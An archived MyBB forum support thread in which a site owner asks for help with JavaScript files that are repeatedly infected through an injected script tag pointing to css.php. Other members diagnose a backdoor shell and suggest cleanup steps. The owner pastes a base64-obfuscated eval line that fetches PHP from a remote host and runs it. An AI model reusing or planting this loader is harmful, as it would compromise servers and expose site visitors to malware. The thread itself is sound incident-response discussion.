MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Infected with Malicious code repeatedly on Javascript files
Full Version: Infected with Malicious code repeatedly on Javascript files
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

ksr

2013-04-03, 07:04 AM
Hi all,

My website url is : http://uniqueminds.in

i am facing a serious security vulnerability on my website, as follows:

PHP code similar to the following line
document.write('<script src="/jscripts/css.php"></script>')

will gets automatically added to my files in jscripts directory, intern css.php will be having some code similar to encoded code like: base64()

When i delete css.php and clean up the files, after 3 or 4 days, its getting added again & again repeatedly and so causing blacklisted by Google. How can i solve this issue.

Please help me to sort it out, if you have a similar experince..

Thanks in Advance

Euan T

2013-04-03, 08:39 AM
Sounds like you have a backdoor or something in your site. CHange your passwords and do a double check of all your web directories for suspicious files.

Doxer

2013-04-05, 12:24 AM
(2013-04-03, 08:39 AM)Euan T Wrote: [ -> ]Sounds like you have a backdoor or something in your site. CHange your passwords and do a double check of all your web directories for suspicious files.

You should also make a database backup. But yes as Euan says, try to detect any suspicious files in your FTP. As for the part where your css.php keeps reappearing, it could be a shell that your attacker keeps adding. For checking if that is a shell, go to this URL.

http://www.yourwebsite.com/css.php

stalls

2013-04-06, 06:16 PM
Mind uploading the source of css.php? Would be interested in decoding it to find what it is.

User 2877

2013-04-06, 11:53 PM
You have a shell in your files somewhere. Clean them all out.

ksr

2013-04-07, 07:53 AM
(2013-04-06, 06:16 PM)stalls Wrote: [ -> ]Mind uploading the source of css.php? Would be interested in decoding it to find what it is.

This code will be similar to like this bro.
 eval(base64_decode('aWYoQGZvcGVuKCdodHRwOi8vaHJoZXJvLmNvbS9iaW9
zL2Jpb3MudHh0JywgJ3InKSkgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c
DovL2hyaGVyby5jb20vYmlvcy9iaW9zLnR4dCcpKTs=l');
(2013-04-06, 11:53 PM)labrocca Wrote: [ -> ]You have a shell in your files somewhere. Clean them all out.

Can you please let me know, what is shell in files? I am not sure what you are saying about.

Josh H.

2013-04-07, 08:25 AM
A shell is also commonly known as a backdoor. It allows an attacker to regain access or reinfect you. Check every folder and compare the contents with a new MyBB download. Any files that you do not specifically know about are red flags.

Any file could theoretically be infecting you though, if code was added to a normal file. So check the last modified date and check any files last modified near when the compromise was noticed.

ksr

2013-04-08, 10:41 AM
this is the file having encrypted code (Google saying Malicious code) that is being upload to my jscripts dir:
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > Infected with Malicious code repeatedly on Javascript files